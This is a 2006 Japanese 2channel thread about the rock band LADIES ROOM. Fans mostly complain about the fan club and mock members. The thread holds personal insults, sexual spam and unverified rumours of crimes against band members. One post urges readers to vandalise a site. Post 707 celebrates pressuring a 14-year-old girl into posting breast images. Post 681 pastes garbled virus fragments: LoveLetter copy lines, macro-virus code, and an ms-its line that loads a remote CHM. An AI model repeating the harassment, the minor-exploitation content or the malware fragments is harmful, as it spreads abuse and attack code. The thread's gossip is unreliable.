Jリーガーが元彼ってことはそれなりに若いってことだよね。
でもJUNさんと幼馴染なんだよね。謎、、、

517 :伝説の名無しさん:2006/06/21(水) 00:24:04
現役じゃなくて元Jリーガー、元日本代表だかんね!

518 :伝説の名無しさん:2006/06/21(水) 09:33:31
>>517
○○ちゃん、なんでJリーガーなんかと???
元アイドルかなんかなの?
教えてちゃんでスマソ

519 :伝説の名無しさん:2006/06/21(水) 09:55:13
>>517じゃないけど。
スゲっお嬢だて噂だからアチコチに顔効くんじゃないかな?

520 :伝説の名無しさん:2006/06/21(水) 09:56:49
ピザ女うるせえ!

521 :伝説の名無しさん:2006/06/21(水) 10:23:59
ほんとこのカス女共やうるせーし。オマイラ芸能リポーターか?wそういうの自分の胸にだけしまっておきなさいね。醜いよ?みっともないよ?wwブタが!

522 :伝説の名無しさん:2006/06/21(水) 11:15:09
>>521
そりゃそーだよwwどうせココに来てる女なんかヒデーブサイク女に決まってんじゃんww旦那の靴でも磨いてればああ〜〜???w

523 :伝説の名無しさん:2006/06/21(水) 13:14:47
悪口言ってるわけじゃないんだし別にいいじゃん

524 :伝説の名無しさん:2006/06/21(水) 13:36:51
そういう事言うのって悪口以上にイヤな思いすると思うからヤメタ方がいいよ。

525 :伝説の名無しさん:2006/06/21(水) 14:07:25
楽しければ何やってもかまへんのじゃ

526 :伝説の名無しさん:2006/06/21(水) 14:13:09
525↑最低人間登場。かまへんってどういう意味?w

527 :伝説の名無しさん:2006/06/21(水) 14:54:45
かまきりの種類じゃん?

528 :伝説の名無しさん:2006/06/21(水) 15:58:08
↑おもしろくない…

529 :伝説の名無しさん:2006/06/21(水) 16:21:20
おもしろい…

530 :伝説の名無しさん:2006/06/21(水) 16:35:51
オサカダ死んだってさ

531 :伝説の名無しさん:2006/06/21(水) 19:21:30
>>524
だけどJ氏自らネタにしてたよね。
書かれたくないなら彼女の存在は隠すべき。

532 :伝説の名無しさん:2006/06/21(水) 19:33:31
楽しければ何やってもかまへんのじゃ

533 :伝説の名無しさん:2006/06/21(水) 19:50:13
J氏自らがネタにって何が?オマエいい加減な事言うなよ?

534 :伝説の名無しさん:2006/06/21(水) 19:58:56
>>531
コイツ何者?w

535 :伝説の名無しさん:2006/06/21(水) 20:04:40
>>531
つかテメーらがネタにしてんじゃん

536 :伝説の名無しさん:2006/06/21(水) 20:12:01
>>532
だから蟷螂男どっか行け

537 :伝説の名無しさん:2006/06/21(水) 20:23:10
http://m-pe.tv/u/page.php?uid=mj23&id=1
荒らして

538 :伝説の名無しさん:2006/06/21(水) 20:43:10
↑何?これ…アホなんじゃねーの?誰?これ

539 :伝説の名無しさん:2006/06/22(木) 17:40:15
ぺペロンチーノww

540 :伝説の名無しさん:2006/06/23(金) 01:13:35
ペペロンチーニ?

541 :伝説の名無しさん:2006/06/23(金) 09:57:14
ノ。

542 :伝説の名無しさん:2006/06/28(水) 16:04:30
みんな、FC更新する?



543 :伝説の名無しさん:2006/06/28(水) 18:05:31
しない。

544 :伝説の名無しさん:2006/06/28(水) 21:23:34
する

545 :伝説の名無しさん:2006/06/28(水) 23:08:17
もうしたよん。

546 :伝説の名無しさん:2006/06/28(水) 23:42:07
しなかった。。。する意味ないもん。。。

547 :伝説の名無しさん:2006/06/29(木) 09:55:39
しない。即退会。意味ないし

548 :伝説の名無しさん:2006/06/29(木) 12:26:20
私も退会派かな。JUNの居ないLADIESなんて全く興味ないし…やめます。

549 :伝説の名無しさん:2006/06/29(木) 13:22:17
ノシ退会
ブログ見る為に金払ってるみたいだ

550 :伝説の名無しさん:2006/06/29(木) 13:45:24
ふむ…ギャンブルや呑んだくれ話のブログだもんね…
亀家ってはいってる意味のまったくないFCだよね

551 :伝説の名無しさん:2006/06/29(木) 14:04:43
ほんと何?あのブログ!有り得ない!あれじゃサラリーマンの独り言?wマジ最悪

552 :伝説の名無しさん:2006/06/29(木) 14:30:47
もしLIVEあっても行かないかな…ツマンナソ

553 :伝説の名無しさん:2006/06/29(木) 16:50:48
さようならLADIESROOM…いや、RHYTHM CRASH

554 :伝説の名無しさん:2006/06/29(木) 17:20:58
来週いっぱいで退会しまーす。つまらないからー

555 :伝説の名無しさん:2006/06/29(木) 17:42:36
ファソクラブのあのブログってホントなんなの?見ててイヤになるんで私も退会します。お疲れ様でした。

556 :伝説の名無しさん:2006/06/29(木) 18:07:49
バンドの資金がどんどん逃げてく〜

557 :伝説の名無しさん:2006/06/29(木) 19:11:34
>>550>>551>>555さん
いつもあんな更新じゃこっちもいちいちコメントしようがないよね(汗

558 :伝説の名無しさん:2006/06/29(木) 19:18:31
コメントなんてしない方がいいんじゃない?してたらいつまでもあんな感じだと思うよ。無視無視。

559 :伝説の名無しさん:2006/06/29(木) 19:25:54
それでもファソにコメント強要するGって…どうよ??

560 :伝説の名無しさん:2006/06/29(木) 19:29:16
アホバカマヌケの何者でもない

561 :伝説の名無しさん:2006/06/29(木) 19:30:05
な〜んにも考えてないんだよ、あの3人。

562 :伝説の名無しさん:2006/06/29(木) 21:16:20
また同一人物が

563 :伝説の名無しさん:2006/06/29(木) 23:39:39
アホバカマヌケにワロス!

564 :伝説の名無しさん:2006/06/29(木) 23:42:06
NAOタン更新NAOタン

565 :伝説の名無しさん:2006/06/30(金) 11:27:10
NAOタン てキモイんですけどー

566 :伝説の名無しさん:2006/06/30(金) 11:29:27
信者だから仕方ないんじゃない?

567 :伝説の名無しさん:2006/06/30(金) 16:42:40
NAOの人気に嫉妬

568 :伝説の名無しさん:2006/06/30(金) 17:32:36
人気者は辛いね〜(>_<;)

569 :伝説の名無しさん:2006/06/30(金) 17:49:42
ぷぷっw一番人気だからねw

570 :伝説の名無しさん:2006/06/30(金) 17:51:16
いいなぁ…人気あってぇ…ww

571 :伝説の名無しさん:2006/06/30(金) 17:55:41
リズクラ3人衆の中で誰が一番カッコイイと思う?

572 :伝説の名無しさん:2006/06/30(金) 18:38:15
応答なしか…

573 :伝説の名無しさん:2006/06/30(金) 18:45:01
>>571 愚問
釣りか?w

574 :伝説の名無しさん:2006/06/30(金) 19:39:58
>>573
うるさいハゲ登場?ww

575 :伝説の名無しさん:2006/06/30(金) 20:07:35
GEORGEに一票

576 :伝説の名無しさん:2006/06/30(金) 20:23:11
サブっ

577 :伝説の名無しさん:2006/06/30(金) 20:36:46
NAOタン可愛いよNAOタン

578 :伝説の名無しさん:2006/06/30(金) 20:38:50
http://members.at.infoseek.co.jp/ukyup/t.html

579 :伝説の名無しさん:2006/06/30(金) 20:53:42
NAOってどうしてそんな人気あんの?

580 :伝説の名無しさん:2006/06/30(金) 21:22:57
JUNが一番かっけー

581 :伝説の名無しさん:2006/06/30(金) 21:47:10
>>579
生まれもった天然

582 :伝説の名無しさん:2006/06/30(金) 21:51:18
誰がカッコいいより亀屋退会の話の方が回る現実…

583 :伝説の名無しさん:2006/07/01(土) 02:58:18
はげ死ねっ!

584 :伝説の名無しさん:2006/07/01(土) 03:06:41
はげはげ言うな!みんなカッコイイんだよ馬鹿!!

585 :伝説の名無しさん:2006/07/01(土) 10:00:35
はげ。

586 :伝説の名無しさん:2006/07/01(土) 13:23:11
もしかしたら亀家なくなっちゃうんじゃん?っていうかオフィあのままだね。

587 :伝説の名無しさん:2006/07/01(土) 14:01:21
確かに…それでファンクラブだけ残そうなんて考えてるんでしょ?考えみえみえ。だから私退会したの。タートルやり方汚いよ

588 :伝説の名無しさん:2006/07/01(土) 14:25:45
>>587
やっぱりね!だと思ったょ。私も退会します。お金捨ててるようなもの

589 :伝説の名無しさん:2006/07/01(土) 16:20:12
無駄金

590 :伝説の名無しさん:2006/07/01(土) 17:58:30
このままじゃ亀家なくなっちゃうよ?

591 :伝説の名無しさん:2006/07/01(土) 18:22:24
蛍のひかり♪ww

592 :伝説の名無しさん:2006/07/01(土) 19:04:10
BBSは一時閉鎖させていただいておりますのでご了承ください。…って、まだなの?一時じゃないじゃん

593 :伝説の名無しさん:2006/07/01(土) 19:42:25
http://natsuyocom.fc2web.com/http://natsuyocom.fc2web.com/http://natsuyocom.fc2web.com/

594 :伝説の名無しさん:2006/07/01(土) 23:10:24
>>590 なくなっても仕方ないよ。
今年になってLIVEないもん;
ロフトイベだって、たまたま30周年が今年だったからだし。

いつまでもファソが待っててくれるなんて甘いw

595 :伝説の名無しさん:2006/07/02(日) 12:35:05
あ〜ま〜いwジョージの頭ん中よりあ〜ま〜い

596 :伝説の名無しさん:2006/07/02(日) 19:11:28
リズクラこのまま終わっちゃのかな

597 :伝説の名無しさん:2006/07/04(火) 03:12:23
↑終わるだろうな。
だってあんた、ご苦労っつってるもん。

598 :伝説の名無しさん:2006/07/04(火) 05:58:59
ハゲ

599 :伝説の名無しさん:2006/07/07(金) 20:32:08
そいえば、、、夜中に僻地のドンキーで犬猫の餌買ってたよなw
だっせ――w

600 :伝説の名無しさん:2006/07/07(金) 20:56:40
ジョージだせーw

601 :伝説の名無しさん:2006/07/07(金) 21:02:24
色んな女んトコにジョージのあげた猫が居るってやつな

602 :伝説の名無しさん:2006/07/07(金) 21:11:17
ソレGじゃないよー
私何度かみてるし

とうてい車じゃなきゃ行けないような
場所にもかかわらず

コジキ丸出し腐女とママちゃりでツルんで現れるw
ってファン中で笑われてたしー

603 :伝説の名無しさん:2006/07/07(金) 22:37:07
>>602
知ってる!だいぶ前だよね!まっ!昔は恥も外聞もなかった人なんだからさWWしゃーないねW

604 :伝説の名無しさん:2006/07/08(土) 06:51:40
ドンキかよWドンドンドンドンキ〜〜

605 :伝説の名無しさん:2006/07/08(土) 11:05:19
ここの人達に相談なんですけど私、レディース?残り三人のメンバーに頑張ってもらう為、タートルに就職しようと思うんですがみなさんどう思います?

606 :伝説の名無しさん:2006/07/08(土) 11:57:46
は?

607 :伝説の名無しさん:2006/07/08(土) 12:55:58
誰も答えてくれないんですね

608 :伝説の名無しさん:2006/07/08(土) 13:30:30
>>605
おいおい、アタマ正気ですか?

609 :伝説の名無しさん:2006/07/08(土) 13:34:04
話しかけんな屑が

610 :伝説の名無しさん:2006/07/08(土) 13:42:57
あの私、本気なんですけど

611 :伝説の名無しさん:2006/07/08(土) 14:04:03
>>609
うるせー、テメーが屑だろが
死ねカス

612 :伝説の名無しさん:2006/07/08(土) 14:13:03
あの私、真剣なんですけど

613 :伝説の名無しさん:2006/07/08(土) 14:15:28
みなさん、三人がずっとこのままで良いと思っているんですか?

614 :伝説の名無しさん:2006/07/08(土) 14:49:37
>>602哀愁ただよった絵が目にうかぶ。。
恥ずかしいよりみじめすぎて。。

615 :伝説の名無しさん:2006/07/08(土) 14:58:27
そうですか。

616 :伝説の名無しさん:2006/07/08(土) 15:02:00
私の話は無視ですか?

617 :伝説の名無しさん:2006/07/08(土) 20:15:50
このバカタレが

618 :伝説の名無しさん:2006/07/08(土) 20:40:31
あの私、真剣なんですけど

619 :伝説の名無しさん:2006/07/08(土) 20:56:01
コノねちっこいしつこさはゴキ級

620 :伝説の名無しさん:2006/07/08(土) 21:14:42
>619
失せろ

621 :伝説の名無しさん:2006/07/08(土) 21:57:36
マジレスしていい?
2chに書き込んでる時点で駄目だよ!
本当に応援したかったら、見ず知らずの他人に相談なんかしてる場合じゃない。
自分の意思で決めて、タートルに自分を売り込んで下さい。
募集してるとかしてないとかは関係ないよ。やる気がある人ならどんな企業でも雇うしさ。

622 :伝説の名無しさん:2006/07/08(土) 22:41:16
ここはお前らの雑談スレか?


623 :伝説の名無しさん:2006/07/08(土) 22:42:55
俺ってヘヴィメタルじゃないよな。

624 :伝説の名無しさん:2006/07/08(土) 22:47:40
>>620←この人ゴキブーw

625 :伝説の名無しさん:2006/07/09(日) 04:27:32
G切ないね〜。自分でコメントつけまくり!!
しかもつまらないね〜。

626 :伝説の名無しさん:2006/07/09(日) 10:50:20
Gさん自分で書き込みしてるとこが悲しすぎる。
だいたいあの三人スポーツの話しかしてねぇけど?どういうこと?

627 :伝説の名無しさん:2006/07/09(日) 11:26:45
巨人魂だから仕方なねぇんじゃん?それにしても亀家つまらん。辞めるからいいけど

628 :伝説の名無しさん:2006/07/09(日) 12:31:17
DVD観て今頃気づいたけどJUN氏サイン変わったんだね

629 :伝説の名無しさん:2006/07/09(日) 14:31:01
前のに比べて随分とシンプルになったみたい。俺なんか連れに頼まれてGにサインしてもらったらチ○コとか書かれて最悪だったよw

630 :伝説の名無しさん:2006/07/09(日) 16:01:05
質問は英語でお願いしまつ。


631 :伝説の名無しさん:2006/07/09(日) 18:50:43
HEAVY METAL!!!!!!!!!!!!!!!!!!!

632 :伝説の名無しさん:2006/07/09(日) 19:05:42
>>631
YOU SUCK

633 :伝説の名無しさん:2006/07/09(日) 19:07:02
オメコさせろやポンター

634 :伝説の名無しさん:2006/07/09(日) 19:14:45
MAKE LOVE QUEEN!!!!!!!!!!!!!!!

635 :伝説の名無しさん:2006/07/09(日) 19:17:48
JUN is a party animal
He lives for women

636 :伝説の名無しさん:2006/07/09(日) 19:19:28
チンチンおっきした

637 :伝説の名無しさん:2006/07/09(日) 19:32:33
FCCK!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

638 :伝説の名無しさん:2006/07/09(日) 19:33:52
Fuckだろ?

639 :伝説の名無しさん:2006/07/09(日) 20:00:08
PORK

640 :伝説の名無しさん:2006/07/09(日) 20:08:49
エロいことばかり言ってると復帰させないぜ

641 :伝説の名無しさん:2006/07/09(日) 20:10:55
じゃあ復帰は無理だ。

642 :伝説の名無しさん:2006/07/09(日) 20:11:56
   λ,,,,,,λ ガオー!
  ∩`iWi´∩ λ,,,,λ グオー!
  ヽ |m| .ノ∩`iWi´∩
   |  ̄| ヽ |m| .ノ
   |   | |  |
   U⌒U  U⌒U

643 :伝説の名無しさん:2006/07/09(日) 20:31:53
            ヽ、    ヽ     ヽ 、   ヽ
   )ヽ、_,,,..._    ヽ、_,   なんだこれは!
   iー-、::_: `、ゝ_,,-  ノ  (    ) 、     )
   ノ::`ー_-_ノ ノ ノ_,-"イ /    ` 、ノ  `i  (   l
,-、 |::::.ヽ _。ヽ:: /_。フ' |ノ   ヽ、      i、   ノ
|6`i/:::. ,,-.―'' /i|.ー-、. |
ヽ ::: i ::    ⌒  : |  うしろの百太郎じゃないか
ヽ`l | ::    /ニ`i   /
 `|:. ヽ、   i_,,,、/  /     ,へ___
  ,|:::._ヽ___/   _//`ー--、ニ=--―,
  | ̄ ̄ ̄ ̄||| ̄|    / / / __     ̄ ̄`¬
 ̄ ̄ ̄ ̄ ̄○ ̄ ̄ヽ | // /   / 三三三  /

644 :伝説の名無しさん:2006/07/09(日) 22:18:05
全く漏れ以外のここの2流住人は自己管理もできてねぇクズばっかだな

645 : :2006/07/09(日) 23:25:07
へるぺす

646 :伝説の名無しさん:2006/07/09(日) 23:37:51
人の道具になるくらいなら、いっそバンドなんてやめてしまえばいい
そういうわけで私は現在にいたります

647 :伝説の名無しさん:2006/07/11(火) 21:01:59
JUNってタトゥーしてる?

648 :伝説の名無しさん:2006/07/12(水) 00:56:33
してるよ。腕とか脇腹とか。

649 :伝説の名無しさん:2006/07/12(水) 09:14:46
M字ハゲ

650 :伝説の名無しさん:2006/07/12(水) 10:07:56
M字開脚。

651 :伝説の名無しさん:2006/07/12(水) 15:47:11
Gって直毛の人?

652 :伝説の名無しさん:2006/07/12(水) 16:11:51
禿の人。

653 :伝説の名無しさん:2006/07/12(水) 16:28:39
                                 >>652                       
   ____________\∧     ∴ .・,‘_    /〈
________─────,.-─-、 7'  , ./ >   \\  ―  、
──────── ̄ ̄ __,ノ  _,,_, ', > "/ /\ \ _  \\:・=
    ̄ ̄ ̄ ̄ ̄ ̄ ̄/´《,_  ,r'´'"  ,ノ >∠_ ― -\ \, ― l |  :. :\\\
             へ   )) Yし〜'”  ゝ / (. -    \ \  | |  .
          //,)) / 〃/  /∨) _(⌒ヽ  ∩    \ \_| |   .::   | | | |
         ∠/ / / 〃/  __            | |   ∩ 〉   ノ  ’;
       / ヾ='  / 〃/ __f' 〉           | |    | |/   /       |‖|
      人      7─' ̄,.-'''´            \ \__|/   /  ; ..: ::  
      /ミ,\____   7ー‐''´                \      /   ∴:: ..  ///
      / \    !|i ̄〈                     >  /., :  ’・
     /   \   !|i.  ',                   (  ・:∵ ・: ・///
     ト ,___彡 \__!|i_,〉                   ∨ ∨三 二
     |  ノ/    \  ト,
    ,ノ リ'      `'ミ )
   / `7        }__」
   }ミ /         {   |
   / /         ヽ  l
 , ヘ__/           ', l
 '=、`つ         ∧_>z- 、
     ̄          '==- '´


654 :伝説の名無しさん:2006/07/12(水) 17:25:07
↑痛ぇんだよ、このやろw

655 :伝説の名無しさん:2006/07/12(水) 17:49:57
禿

656 :伝説の名無しさん:2006/07/12(水) 18:30:42
映画にサッカーに野球…つまらねぇファンクラブ

657 :伝説の名無しさん:2006/07/12(水) 20:30:33
スーパータートルアタッカー

658 :伝説の名無しさん:2006/07/13(木) 11:14:09
「ジュースの森」

659 :伝説の名無しさん:2006/07/13(木) 11:46:33
「スーパージュース」

660 :伝説の名無しさん:2006/07/13(木) 13:06:14
ジュースジャパン

661 :伝説の名無しさん:2006/07/13(木) 13:08:28
おもしろくないよ?

662 :伝説の名無しさん:2006/07/13(木) 13:40:02
どうでもいいけどココは音楽的な話が全くないねw

663 :伝説の名無しさん:2006/07/13(木) 13:54:15
涼宮ハルヒの憤慨を読み終わったぜ

664 :伝説の名無しさん:2006/07/13(木) 14:01:01
http://www.haruhi.tv/fanclub/

665 :伝説の名無しさん:2006/07/13(木) 14:29:07
ぉれの彼女ジョージに食われた

666 :伝説の名無しさん:2006/07/13(木) 14:52:43
>セックスの匂いを漂わせる歌詞を大人の色気と共に歌い上げるHyaku

読んで吹いたw

667 :伝説の名無しさん:2006/07/14(金) 05:39:05
パンパカパーン!はいっ、OL進化論800回記念でーす!
みんなも祝って祝ってー!ドンドンドン!パフパフパフー!

・・・えっと、次号は明日発売だから、今日お祝いしてもいいんだよね?
ギリギリセーフなんだよね?余裕で間に合ってるんだよねっ、うんうんっ

668 :伝説の名無しさん:2006/07/14(金) 13:12:44
俺、ブロリーが好きだな!ドラゴンボールでスマソ。

669 :伝説の名無しさん:2006/07/14(金) 13:13:03
他の2人はやる気ナシ?

【NAO】

ひぇ〜
本当に暑いなー

670 :伝説の名無しさん:2006/07/14(金) 13:56:24
>>668
べジータっしょ

671 :伝説の名無しさん:2006/07/14(金) 14:27:56
ジダンの退場シーンについて、あるフランス人弁護士が「ビデオで確認したのなら無効」との声を上げているとロイター通信が報じた。どう思う?

672 :伝説の名無しさん:2006/07/14(金) 15:13:37
えへへ…///
一人エッチしちゃった…

673 :伝説の名無しさん:2006/07/14(金) 15:22:35
. ┼  ヽ       |     /
. _|, '"ヽ,  ヽ  ヽ, .|    く
(_ノ  ノ   ヽ'  ´ ヽ、_ノ   \

.|   .  ー┼-   ー┼- ヽヽ ―┼―  _|_   |    ー┼-
 |   |   | _    | _   ―┼―  _|_   |     | _
 |   |   |     |       |     __|    .|     |
 V       | ー   | ー   \_   (_丿\  ヽ___ノ  | ー


674 :伝説の名無しさん:2006/07/14(金) 17:21:12
流川楓はかっちょいいュ

675 :伝説の名無しさん:2006/07/14(金) 18:16:00
スラムダンクキタ---------------------


676 :伝説の名無しさん:2006/07/14(金) 18:27:06
安西先生…

677 :伝説の名無しさん:2006/07/14(金) 19:03:34
赤木剛憲

678 :伝説の名無しさん:2006/07/15(土) 01:06:10
湘北

679 :伝説の名無しさん:2006/07/15(土) 11:19:09
牧 紳一(海南)

680 :伝説の名無しさん:2006/07/15(土) 12:18:48
身長:180cm
背番号:7
ポジション:SG
…さぁ誰でしょうか。

681 :伝説の名無しさん:2006/07/15(土) 13:21:24
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

682 :伝説の名無しさん:2006/07/15(土) 18:38:55
深津 一成:ピョン吉
言葉の最後に「ピョン」をつけることに凝っている。
    その前は「ベシ」。たまに「ピョン」なのに「ベシ」と間違えてしまう。
    リョータが「ぴょん」を使ったら、「違うピョン。『だピョン』『だピヨン』」と、
    かなり言い方にこだわっている。
    こんな彼だが、試合中は精神にムラがなく、
    何事にも動じないプレイヤーである。

683 :伝説の名無しさん:2006/07/15(土) 19:20:23
イチノの得意技はスッポンディフェンスという固く、きついディフェンスをしてくる。
    校内マラソンでは陸上部にも負けたことはなく、
    猛烈に腹が痛くなったとき気を失うまで我慢したこともある。
    なんと、その原因は急性盲腸炎だったそうだ。
    深津、河田、沢北、、野辺はキツイ練習に耐えかねて
    合宿所から逃げ出したことがあったが、
    この男にはない。まさに、この男は山王の中で最も我慢強い男である。

684 :伝説の名無しさん:2006/07/15(土) 22:08:33
ウイルスキタコレ

685 :伝説の名無しさん:2006/07/17(月) 10:14:31
ここのベースとつき合う女はみんなキ〇ガイになるっつーのマジ?友達のねーちゃんそいつのせいでドラッグやりまくりでリスカばっかしてんだって!W

686 :伝説の名無しさん:2006/07/17(月) 10:42:49
Gはドラッグやらねーし、友達のねーちゃんの自己管理がなってないだけじゃないかな?
確かにGにかかわったらいろんな意味で大変ですが。W

687 :伝説の名無しさん:2006/07/17(月) 11:20:32
もう20年近くGのかっこよさがまったく分からないんだけど…………ι
だってGってなんか汚らしくない?

688 :伝説の名無しさん:2006/07/17(月) 12:49:57
センス悪杉!Gって何であんな格好してんの?

689 :伝説の名無しさん:2006/07/17(月) 14:24:26
ないすふぁっしょんせんす(笑)

690 :伝説の名無しさん:2006/07/17(月) 17:08:38
第一回「ナンセンス大賞」堂々第一位受賞男松嵜丈二

691 :伝説の名無しさん:2006/07/17(月) 17:36:10
JUNが一番かっこいい

692 :伝説の名無しさん:2006/07/17(月) 17:46:22
Gはドラッグはしないかもしれないけどアル中だから性格おかしいんでしょうね。
けど、アル中も薬中も一緒だよ!
訳わかんないとこでキレて相手が間違ってると否定する。
っていうか彼のみえてる世界の中ではそれが正しいから自分は間違ってるなんて思ってないんだろうし、自分が世間とどの辺りがずれてるかも解ってないんだろうけれど。
独善的で周りを振り回すただの酒に呑まれたおっさんじゃん。いやっ!

693 :伝説の名無しさん:2006/07/17(月) 17:53:13
一位ってなに?w大賞なのに?

694 :伝説の名無しさん:2006/07/17(月) 17:56:09
>>692
あなたの言ってる事正しいあるよ。

695 :伝説の名無しさん:2006/07/17(月) 18:14:28
>>694
あなたの言ってる事正しいあるよ。

696 :伝説の名無しさん:2006/07/17(月) 19:36:39
Gスレ…Gのファッションセンスを語る。

697 :伝説の名無しさん:2006/07/17(月) 19:53:42
語らない!!

698 :伝説の名無しさん:2006/07/18(火) 11:45:16
普通の事を凄く大袈裟に話すG。w
とにかく話を拡大するG。w
マジ疲れる…

699 :伝説の名無しさん:2006/07/18(火) 11:46:20
誰か洋服買ってあげなよ

700 :伝説の名無しさん:2006/07/18(火) 11:50:54
ww苦笑…プププ

701 :伝説の名無しさん:2006/07/18(火) 12:44:23
本人金がねぇから買えないんだよw買うって言ってもあんな服どこで売ってんの?千葉?w

702 :伝説の名無しさん:2006/07/18(火) 13:12:05
◯トー◯ーカドー

703 :伝説の名無しさん:2006/07/18(火) 13:20:07
ダ○エーもあるよ

704 :伝説の名無しさん:2006/07/18(火) 13:48:55
いや、あの服はニッセンでしょw

705 :伝説の名無しさん:2006/07/18(火) 14:29:55
通販でも買えねぇだろw

706 :伝説の名無しさん:2006/07/18(火) 14:35:19
ジャパネットで売ってるよ

707 :伝説の名無しさん:2006/07/18(火) 14:36:33
おい、吹奏楽板住民がとうとう降参したぞ!wwwwwwww
14歳のひきこもり女子中学生がおっぱいうpするから許してくださいだってよwwwww
http://music4.2ch.net/test/read.cgi/suisou/1153090678/

443 MEG 2006/07/18(火) 14:30:38 ID:Q8Tceq+n
   本当にごめんなさい!だから警察や学校には言わないでください(泣
   そうしないとこの町にいられなくなってしまいます!本当です。
   >>431の名無し行進曲さんが言うようにおっぱいを画像で出せば許してくれるのだったら
   今すぐ出します!!!!
   本当にごめんなさい!本当にごめんなさい!

708 :伝説の名無しさん:2006/07/18(火) 14:41:10
>>707
 玉虫

709 :伝説の名無しさん:2006/07/18(火) 14:54:07
マテラッツィ選手はジダン選手に一体何と言ったのか?

710 :伝説の名無しさん:2006/07/18(火) 15:08:05
709
「おい!このハゲ」って

711 :伝説の名無しさん:2006/07/18(火) 16:38:56
王監督胃がんの手術成功だって〜 10日で退院もできるみたいよ?

712 :伝説の名無しさん:2006/07/18(火) 16:57:19
禿げてるのはジョージだけ?

713 :伝説の名無しさん:2006/07/18(火) 16:59:05
そう。NもHも平気っぽい?…Hがヤバイ?

714 :伝説の名無しさん:2006/07/18(火) 18:30:58
イタリア・セリエAの八百長疑惑によりセリエB降格を申し渡されたフィオレンティーナ。現地時間17日、この処分に対して不満な同クラブのサポーターが線路を行進し、鉄道が運休となる事件が起こったらしい

715 :伝説の名無しさん:2006/07/18(火) 19:46:17
不正行為への関与で、セリエB降格処分を受けたユベントスの主力選手流出の動きが表面化してきた。スペイン紙アスはイタリア代表主将DFカンナバーロがスペインリーグ・Rマドリード移籍を決断したと報じた。

716 :伝説の名無しさん:2006/07/18(火) 19:51:31
で、レアルは同国代表DFザンブロッタ、ブラジル代表MFエメルソン、フランス代表MFビエラの獲得を狙っていることも判明!いよいよユーベ崩壊が“レアル主導”で始まったよ!

717 :伝説の名無しさん:2006/07/19(水) 13:43:08
巨人の原監督が昨日、甲子園球場に隣接する室内練習場で、二岡に約40分間、熱血指導を行ったんだってさ!自らが打撃投手として約300球を二岡に投げ込み、スイングをチェックしたらしいけどジャイアンツ全員の選手をやってもらいたいよ!

718 :伝説の名無しさん:2006/07/19(水) 13:57:37
王監督

719 :伝説の名無しさん:2006/07/19(水) 14:09:50
うん、昨日はソフトバンクが8回の逆転劇で手術を終えたばかりの王監督に勝利を贈ったとさ

720 :伝説の名無しさん:2006/07/19(水) 14:21:40
最近の新庄は?

721 :伝説の名無しさん:2006/07/19(水) 14:43:05
阪神で亀山と頑張ってるよ


722 :伝説の名無しさん:2006/07/19(水) 17:34:32
サンクス!けど、金本すげぇなュ

723 :伝説の名無しさん:2006/07/20(木) 11:47:26
欽ちゃん球団ウゼェ

724 :伝説の名無しさん:2006/07/20(木) 13:57:11
ディープインパクト、日本馬として初の首位!!

725 :伝説の名無しさん:2006/07/20(木) 14:48:12
おい!ジョージ聞いてるか!?テメェのせいでまたジャイアンツ負けたじゃねぇか!早く動けよボケが

726 :伝説の名無しさん:2006/07/20(木) 16:00:10
意味分かんネ

727 :伝説の名無しさん:2006/07/20(木) 16:17:53
セリエAに2チームの関与が明らかになる可能性だってよ!?不正疑惑…

728 :伝説の名無しさん:2006/07/20(木) 19:47:31
ブラジル代表パレイラ監督が辞任

729 :伝説の名無しさん:2006/07/20(木) 21:04:25
G婦女暴行でタ━━━イホッ

730 :伝説の名無しさん:2006/07/21(金) 10:12:34
朝青龍、12連勝オメデト

731 :伝説の名無しさん:2006/07/21(金) 14:49:27
>>709
どう考えてもマテラッツィが悪い。アイツ生意気

732 :伝説の名無しさん:2006/07/21(金) 19:44:58
プロ野球オールスターゲーム。セリーグの本塁打争いトップ(29本)を走る李承ヨプ(唯一の巨人選手トホホ…)との対決が楽しみだ

733 :伝説の名無しさん:2006/07/21(金) 21:42:02
3-1でセ・リーグ勝ったじゃん

734 :伝説の名無しさん:2006/07/22(土) 12:52:36
なんでスポーツニュースなの?

735 :伝説の名無しさん:2006/07/22(土) 14:44:31
欽ちゃん球団存続かよ!なんなんだよ!だったらはじめから解散とか言うなよ

736 :伝説の名無しさん:2006/07/24(月) 11:25:22
欽ちゃんだから仕方ねぇよ…あのオッサン最悪だなw

737 :伝説の名無しさん:2006/07/26(水) 13:26:15
レディースルーム…

ライヴしないのかなぁ…
一度も行ったことないから、行きたいのに(´;ω;)
このまま、解散だけは
やめて欲しいなぁ。

738 :伝説の名無しさん:2006/07/26(水) 16:55:59
…僕達、もう普通の男の子に戻りまーす!

739 :伝説の名無しさん:2006/07/26(水) 18:36:05
J始動か?!
http://notdead.blog59.fc2.com/blog-entry-1.html#more

740 :伝説の名無しさん:2006/07/26(水) 19:38:55
